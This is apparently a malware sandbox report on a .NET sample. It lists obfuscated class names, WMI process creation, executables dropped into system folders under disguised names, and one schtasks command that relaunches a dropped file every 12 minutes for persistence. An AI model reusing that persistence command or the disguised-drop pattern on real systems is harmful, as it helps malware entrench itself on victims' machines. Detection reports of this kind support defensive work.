Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, J5rAfmdOnSH5obxqQ33.cs	High entropy of concatenated method names: 'ovZdU26ktV', 'TaKdZCbFuB', 'GkhfO3LhvOoH5v9K9YH', 'puhjrSLTYNFQQIbdifl', 'vmtS3ELO0Vvxf51h3lj', 'q2331vLyKtPA9iNe8dO', 'N9YO2vLc9jHpyqoiD3a', 'grAf3TLeOSaG62WGBEr', 'WsbD3xLdtR4MOLVL11Y', 'QOCdb9LjToxPwUqSq9F'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, kNUIwUds6aLAYcX8sRu.cs	High entropy of concatenated method names: 'eQ6J2V8I9S', 'H8mJmrUocR', 'oiVJ1WBifB', 'lEMxXqPCOXneaQ8lXeW', 'ctC4RFPIKdUGx0BUaca', 'igulTIPGBtB6J3AFIYe', 'Kty74UPXoVL04DrISKs', 'yegbWDPFmKUbRX6N5fJ', 'XlQdP9P7KCfgc196490', 'iJLsr7PwUjT1RQXltmm'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, FxBBm12WOEWJVdaGx2G.cs	High entropy of concatenated method names: 'TLpOUU0bIf', 's3sOpUXVew', 'Yt7O43F3SM', 'v3lOuv8MP5', 'iwTOBf3nLn', 'YoQOvTpD1v', 'PuOOno6osW', 'kPWOcGoNum', 'hfyOAMIRHN', 's0qO0WqcAI'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, Y3Nbs82qiBFO6wtL6gY.cs	High entropy of concatenated method names: '_7zt', 'zJESPQ25FT', 'pLjSHn0oHU', 'MyoSTFXKUe', 'pKbStZYCu7', 'HdCSNuE8UB', 'RSZSQFqaLP', 'RtwsgXlccIQrImrIF9H', 'P4NhhZleudrbxRxsudC', 'g70frDlOpHevFcKhAHX'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, GtD0sVdQdir9JlBIyHN.cs	High entropy of concatenated method names: 's5tLD9IOhB', 'naRLRTXIHT', 'ceupVOUJ4LSsjMUDStQ', 'KixL6kUK9xtgsXk4ba6', 'CyxM0JU8o6aoo5GlRVj', 'gkywiCU4QjdngsL1KA5', 'Qg5LqoRHpk', 'sgPpNBB03EQO5mHNBbT', 'TLtHpEB1mWKGfYxxNko', 'UW8pHiU9feWNsT957DZ'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, oGvGNJxtjlb6HnGJh1o.cs	High entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'UZjKGGYY2i6647O0xQ7', 'rqbmD4YD84DfKOUNXcg', 'uhLEKsYWBNuAU22VPHX', 'QtgNHNYQC0DCro0F9VA', 'jfNasRYbLyVFtLTWn7n', 'M8oqhbYPlj72kndcafE'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, XmEgL5vFYHdIlbBoieu.cs	High entropy of concatenated method names: 'dxubDSvrDqj0L64PCPo', 'ud6R5uvmK9e4bBBXepT', 'nG3s2cvH9kUf25daKoQ', 'SxDrSlvfIwSmYKvqcyJ', 'aPD1pyff9P', 'WM4', '_499', 'hbb14TGa1k', 'kAZ1uRMGXE', 'W0c1BFm1EX'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, uf56I0FITD4Ksy0VmJ.cs	High entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'dNB0rCkLo', 'xF28LuHGYe4iISAvWR2', 'ONQdSQHXdHrXpHy5q3e', 'DyqBboHFGSeDh4XfA0A', 'aJNSU0H7SwEHiJmcEQ1', 'VSO8XwHE4qg832HKfXa'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, EXgHrSPHpOnupqOtxUD.cs	High entropy of concatenated method names: 'PXlByHCcrdaLbMMQ7IB', 'GcVA9xCeiNSEytLvfyv', 'beETwxCOa26aLSsACW6', 'HdY6CnCyiA0J9DIt7Tj', 'lkXHyjpkr3', 'rlEpvgCl7pgHIwXLnhS', 'rlZ7IACn8XO39dHISiv', 'xsVC4nCd8sq7OaQ96b9', 'rUES4xCj2ZScl1ZRISU', 'kXjFwRCMX0JnU0PLfM7'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, GwND6cHmsL3q1nqDmNk.cs	High entropy of concatenated method names: 'xHQDoYk0sT', 'rtXDpqANRI', 'cmND4Ba1X2', 'o7BBy3OLMLJiZnYFtXH', 'kkg05VOZcj3Ef6xRV1u', 'OGAHQSOxckYF429hudd', 'A5HgSqOa9p9WftNZWDB', 'vNuDVR1h2X', 'VXFD5cYpFJ', 'tQrDqOXpld'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, KdaWwF2AtUhLwxy5mCD.cs	High entropy of concatenated method names: 'eZPaoPJepC', 'h9UapsXUKV', 'Inba4ngGok', 'zVraurw5OP', 'abBaBwMakt', 'wxcS6Inh9MS4vsDIfXE', 'yKc9kcnUXvEN2jmhvUh', 'tiItDtnBOvJX0QMHbJc', 'Dd7mK8nT0CNu3QDLH3O', 'lI7mllnOudqYtnpZfBp'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, qsu4IuHklGUdbEpAIDS.cs	High entropy of concatenated method names: '_9YY', '_57I', 'w51', 'kEth3GANv4', '_168', 'MnZZD2ejeJj8qaeJkLe', 'QIt8iNelFY1uRL2PRbP', 'NO3wR1end6Movh18p6W', 'vIn7CSeMgWBUJGwd3hg', 'W5J0iTekw0RK5VlsGDn'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, EdobsHxiUuLuWgIwgUk.cs	High entropy of concatenated method names: 'yiQ', 'YZ8', '_5li', 'G9C', 'qXjDQvD0ieljtlJwGU9', 'l5qdyZD1ygcXJCLblge', 'RPG4FMDHaNDAZWZN9L9', 'n9mSdSDfInGuD3JMa28', 'OiEGgWDrSHXCrZ0kXMZ', 'NeYYFUDmaM4G6F5ZjDd'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, SOCXQIvvSuFsEsAvdB6.cs	High entropy of concatenated method names: 'Qkp', '_72e', 'R26', '_7w6', 'Awi', 'n73', 'cek', 'ro1', '_9j4', '_453'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, YEH491x6v8Eq6vA70fn.cs	High entropy of concatenated method names: 'fOKJNbBWi5', 'OnXJQcsxfe', 'VjVJywtpDW', 'sIfS77PbpNde5pxjO80', 'E6aOmIPWisFI56o9L2R', 'fjbsVuPQFPIcTUtN6lr', 'pmqtxpPPFvvcJJ9xlOA', 'Q2nALpPZNd0DuYXCMlb', 'M7Do1BPxUjHATa0dT0m', 'n8SNySPLTATM95iWNrS'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, gJ4HMhHz5ZjWXtQVHHB.cs	High entropy of concatenated method names: 'RNLIbaHrVM', 'rjJIXt2Wp5', 'uCPIk0q8Om', 'bhmVwgdRmrEInWHLFfR', 'WtQky8dA3CQQxSbmwKh', 'l0qdKvdEkTsRL2bdL3o', 'IAhGSvdN18b9c1XFops', 'qhMnCrdvpDVeTknYKHj', 'QqgH4udp2SgFENxuPmS', 'Yo9wJjd2KkDT5MyMPGF'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, HEb6cqvsWBdvRqy7bNc.cs	High entropy of concatenated method names: 'TO62E44DYa', 'M6D2iZoHqs', 'Y5k2wVhoIH', 'nfJ29gAD35', 'wES2rAwrJ6', 'p4A27geMHW', '_838', 'vVb', 'g24', '_9oL'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, sDvIqpvAnbLmW1APfkh.cs	High entropy of concatenated method names: 'D4M', '_4DP', 'HU2', '_4Ke', '_5C9', '_7b1', 'lV5', 'H7p', 'V5L', '_736'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, qK3WnlHncWAaXnKbqsX.cs	High entropy of concatenated method names: 'F8LD0bmHLu', 'j9ND6fMBdo', 'lljDEGmJur', 'egSDiJNW2x', 'xAjFOlOICmF60gcg0fc', 'E1u3VAOGIMyEJOBi5Xi', 'ccgFJAOXhMJ6lPTyTb6', 'wRnNE2OgvfDE3iSokaO', 'MS0bAqOCxdT1K8vty4G', 'e40WZHOF9XaDaq8Q7kY'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, Qp9ND9vSm9d4LO3g3cN.cs	High entropy of concatenated method names: 'l7rmHbm25V', 'lw7mTjTyiD', 'kLfmtsOT5L', 'hWNmNucWq6', 'vo9mQrycbU', 'DSx9JdNVdnx97EClt0m', 'FWrQUlN68X89gkEtWZC', 'JLydAUN9ERFCuPovtBs', 'zusoCnNzmqGwkOuWkID', 'KvsqXnR0svwAp6aFdRi'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, TKGeKudtqSKXKDJdtKa.cs	High entropy of concatenated method names: 'cDWdglPwMB', 'K6CdoCdNvy', 'euOdpPDKgP', 'CIid4wkUhs', 'xf9duO0hUM', 'koFdBNZe7q', 'sCEdvpje1Z', 'HPVHZdxdtMRMpXFysdk', 'kSLkEMxcwbj817Lvkl5', 'WGHWCnxeOfqmpJgyP6F'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, HdZGWB2PBXuUOXORXwW.cs	High entropy of concatenated method names: 'PRFsqtkidB', 'zVw0mejBdMU32AIysGZ', 'YdCC67jh4CgKJryOVsg', 'PpaKPVj3RGej5mTk8UC', 'k5R639jULgKWY1wusja', 'gXVIF5W4lJ', 'm8BIxPR6oJ', 'M2PIgiAAFZ', 'YW1IoMH4di', 'GlyIpNH5YD'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, wTsd8RxStWyVl0fsjYo.cs	High entropy of concatenated method names: 'gHL', 'YZ8', 'vF9', 'G9C', 'W3NCdADdmEyyZgjtSGA', 'ee4NrIDjrPv7n4wYkh2', 'QI0nGhDlM5y8vKWnIDW', 'foRoPYDntjISlcCaxpJ', 'WY0RdkDMs2j9i1Fh9cr', 'SQBVVxDkc8ABACbc6hY'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, vFM6u2vVBLJoQhr3kKv.cs	High entropy of concatenated method names: 'BED1RpNFW8', 'crZ1IEPJBG', 'u3G1eHdsK8', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'ArR1snfwCB'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, TF0IUov7usy5vE09y9x.cs	High entropy of concatenated method names: '_7tu', '_8ge', 'DyU', '_58f', '_254', '_6Q3', '_7f4', 'B3I', '_75k', 'd4G'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, XXhVlAH5s8ukskSoeYm.cs	High entropy of concatenated method names: 'dGVt2OdF3QaJjao9AKQ', 'BALO81d7HuENtqc2BKy', 'TOSGkudGYDLBSrWkZyQ', 'dG54a7dXVFXw9BF22qb', 'IWF', 'j72', 'KjMIqCP1SI', 'uAbIGwGUK0', 'j4z', 'sNHIhWbcHP'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, z6HFWC2jJqjOFF4ybI8.cs	High entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, wgB2BFHDRL8kWVObVbc.cs	High entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'D9vIeuUyhi', 'pxYhmVT4Lg', 'oQ4Iso2QLu', 'GrZhUyx9Ap', 'Sfw1WRe7hu9wQ97fvWI', 'msjB3deEJ2ftc8n8IDA', 'QNoI85eXjg9avV8hTFL'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, Sv31mcPhaq4hjoFxTvA.cs	High entropy of concatenated method names: '_14Y', 'b41', 'D7Y', 'xMq', 'i39', '_77u', '_4PG', '_5u8', 'h12', '_2KT'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, xrMXjZHUqZ0rMu0AcEc.cs	High entropy of concatenated method names: 'TD5RgfPpZ5', 'MigRoYQiEr', 'bZyrOlcB9GpyJA8Sscg', 'Ur3PS9chvI21c2FPEbw', 'FJU492c3cuVSQeTjkvq', 'jWDKiecUxHy1RCX6dQq', 'Bmfw4UcTXlwYveuPk8e', 'hM1eZ3cOiRQZvlTLaiM'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, p9PxYPpsQXEcLkes76.cs	High entropy of concatenated method names: 'sQWadSGKA', 'tligAtCBytty3vJRpx', 'V0wpcwwMlxNIEuEOTN', 'K1eKSwgekeIqljjOaN', 'i9CvWfIDvv04TF7VXW', 'laW9cxGh6I8UOnQLcy', 'YoPJgE3de', 'X5qdua8kC', 'W9bjhk4J7', 'tc7lh7217'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, J0DE0Kvd8JuawVUAtC2.cs	High entropy of concatenated method names: 'idkmDpIanF', 'aCymRTHV4H', '_8r1', 'vdCmIk0gw9', 'KkDmeLTwHu', 'Uqlms4uqMX', 'WpMmSjHNsp', 'jJpWGSNioXsvU6C0RCX', 'D3awsIN30xc7nUO9eca', 'Nxcs95NUXEJgnlFRv4N'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, G38RDi252CKviTV9ytk.cs	High entropy of concatenated method names: 'tXvV2sK8ss', 'ICRV1jYpW8', 'FsfVaWNg66', 'xqHVOHlhGA', 'TrkVV2nyMm', 'quAV5m8mGl', 'o5LVqrVePG', 'YNLVGZDFnK', 'AHNVhJmPH1', 'UMZVPt2TAr'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, ofmXxE2anoUOFE8wpAw.cs	High entropy of concatenated method names: 'P29', '_3xW', 'bOP', 'Th1', '_36d', 'DrpOVKPmup', 'KEOO5UgiVv', 'r8j', 'LS1', '_55S'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, iFR2GBBsoqilQycLKZ.cs	High entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'S4rEvCrv6uWiUXAguUr', 'YevFxMrpTTjSpj7oH2b', 'fcqn2vr2YtBESJC5rvf', 'PpJuH9rthpBqCfcRn5D', 'dPua6Mr5UZ62GBh2mHQ', 'UD20TGropeniUbnFiSi'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, tgtmn9xHcUiWryXrSYl.cs	High entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'om3UiYSuE4IqN05yMEL', 'XVK9EgSw1ZaI342rKvJ', 'c67Qw4SgfsYOojThWpR', 'yHHB7KSCi7QL0uZ5bDm', 'eXFWaeSIlI2DR0fubt8', 'DIQRFSSGCdCiuUBHlKX'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, JAAyIsjoV51tXnwJL5.cs	High entropy of concatenated method names: '_52U', 'YZ8', 'M5A', 'G9C', 'f5f966m46OkVf79oMkA', 'FDx45emJ2E6WaoSZifb', 'lpFWP7mKgI2KA2KkZ4E', 'pQSnlsmVYTiwKOo37do', 'WAfDxAm6LhBZMcAF4Uo', 'Invpwim9bbxudEjOdxe'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, xEdyk0pGyEZdwNfJrVM.cs	High entropy of concatenated method names: 'T8ZFrcxxMFViC', 'IN7ThG2aXxHIR6NEsZX', 'EJQ1ju2iraGMgJ8JQUR', 'lYj4AM23IsjC9iCqmZN', 'jP4wyq2UVwChr0hohq5', 'tM7qAK2BivJ1maGc7Nv', 'VteMmU2xBZuUFL7DcLA', 'jN0rVn2LGc2Ep4uVSZI', 'yxreEX2hq8XitZpOKwX', 'dEw0nZ2THyP4O3nU9V0'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, uiNFQWN5YCABh7iHYT.cs	High entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'zum4ggfXw4b3aqDLRqQ', 'qXoXipfFA0i4aSPAoXi', 'huAqELf7fiqtvNfZ2j1', 'U4vFnkfEw6vtQ7ChR7S', 'QP8LbDfNiFZA5pnFoYH', 'nbQi0MfR3r322MNtDub'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, MEjM15HRjcDLKWWHdqb.cs	High entropy of concatenated method names: '_5u9', 'qoihuxATpU', 'ydtIYbD4FG', 'tcMhnVLfG6', 'fdjRwacVIQn5tZ2rGVM', 'y6mBPFc6uiejK5JJVkp', 'JDmUAwc90XGHc9aRkm4', 'UN1NvocJDeUpmhGyyDk', 'MVUKeecKqX4YZugr7lL', 'SCCqTqcz0nDuc5OD9v7'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, lclwcL2yYWCHURPnBqc.cs	High entropy of concatenated method names: 'RJaSoa0Sxu', 'iXySpKSri3', 'DR6S4Brq4I', 'EZ4SuPhpuR', 'bwlSBsb5uU', 'gpLhyAlGlLbyQwRyh9U', 'Ejrwq0lXjs8bvS6BbdB', 'GETd5SlCG4elBQfRIM2', 'VnhOB9lIhQkuQKnHKvr', 'vkgsUPlFIZmNnIHZFeF'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, Ic1lbJxBlYR5Vd6Y03P.cs	High entropy of concatenated method names: 'GO0JeljiLt', 'wYjJsEXrQH', 'boObWMbPnKX0n4DIajK', 'qjGhv1bQ1rT8oImeWQW', 'ymPV4ybbdtMnuxusofk', 'CVKdblbZRxHbeWQyJAP', 'uoH9CnbxLRdWkcA5UDf', 'xUjClmbLfPCDxyRQkRW', 'VkCKwUbapHLJDq0CDXj', 'hbRVFPbibbMNVCD5pR1'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, bQ6i0Hkkwri0R9dFNn.cs	High entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'dF08xcmSDi7upDOiVfd', 'u3Nu3gmYhUVyvJrOtaH', 'q1WIuZmDv78B0Y8vG8m', 'LNWHeamWD5pBTMBHd5v', 'B5CSs6mQsgFBco8ov8m', 'L82Wq3mbN9Ko4cH4m8Q'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, bMRL1Bxxwk6FI6S5LrF.cs	High entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'SMmHFaShRg201Pu8COL', 'SlJNgqSTFsuJ3qkJivn', 'e6LG41SOwLk2RGXktCM', 't92i0GSyHTbqFZMsjuO', 'pOStiPScA2A5aZ4mPJ6', 'vdjU2ySe6PNrkHsXUBi'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, h5CTTdHf4XDoUsmegoU.cs	High entropy of concatenated method names: 'sg9', 'oOYh2UJ2Ex', 'kfhRUAbBbZ', 'd1WhJUoerB', 'RfpjM4c59iIuBbfJqys', 'YkCrWacomh68wxcOuhE', 'o4Ox2XcsCGYP3E95hUE', 'JTKjm9c2PVLuLyxg3Dd', 'DxHKGkctIgCg6rCf9Pe', 'jFGqAccqs9mlNdyytHb'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, DbE3CjWFZ20ViwL73k.cs	High entropy of concatenated method names: 'pHw', 'YZ8', 'v2R', 'G9C', 'lVuxummMk5hLKNdbmht', 'sd7Z51mkkwMpeG7lXjS', 'LkaerumuaW8A24hVSHh', 'gaxfMqmwYeiCfE4Bbi7', 'ugU85lmgPQ71yoWev2O', 'xvlBMUmCaKAIC1i2luQ'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, pErmpcva1JevEo5WjP7.cs	High entropy of concatenated method names: 'JARkNjXsbX', '_1kO', '_9v4', '_294', 'PWFkQWwLLJ', 'euj', 'AxakygRb8U', 'hYGk2oJgX9', 'o87', 'hR6kmRikKc'

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\surrogateserverreviewsession\Agentserver.exe	File created: C:\surrogateserverreviewsession\dasHost.exe	Jump to dropped file
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	File created: C:\surrogateserverreviewsession\Agentserver.exe	Jump to dropped file
Source: C:\surrogateserverreviewsession\Agentserver.exe	File created: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Jump to dropped file
Source: C:\surrogateserverreviewsession\Agentserver.exe	File created: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Jump to dropped file
Source: C:\surrogateserverreviewsession\Agentserver.exe	File created: C:\Recovery\uXGucUKOPdf.exe	Jump to dropped file
Source: C:\surrogateserverreviewsession\Agentserver.exe	File created: C:\Program Files (x86)\Microsoft.NET\RedistList\uXGucUKOPdf.exe	Jump to dropped file
Source: C:\surrogateserverreviewsession\Agentserver.exe	File created: C:\Windows\Containers\serviced\uXGucUKOPdf.exe	Jump to dropped file
Source: C:\surrogateserverreviewsession\Agentserver.exe	File created: C:\Windows\Offline Web Pages\uXGucUKOPdf.exe	Jump to dropped file
Source: C:\surrogateserverreviewsession\Agentserver.exe	File created: C:\Program Files\Windows Security\BrowserCore\en-US\uXGucUKOPdf.exe	Jump to dropped file

Source: C:\surrogateserverreviewsession\Agentserver.exe	File created: C:\Windows\Containers\serviced\uXGucUKOPdf.exe			Jump to dropped file
Source: C:\surrogateserverreviewsession\Agentserver.exe	File created: C:\Windows\Offline Web Pages\uXGucUKOPdf.exe			Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\surrogateserverreviewsession\Agentserver.exe

Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "uXGucUKOPdfu" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\uXGucUKOPdf.exe'" /f

Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
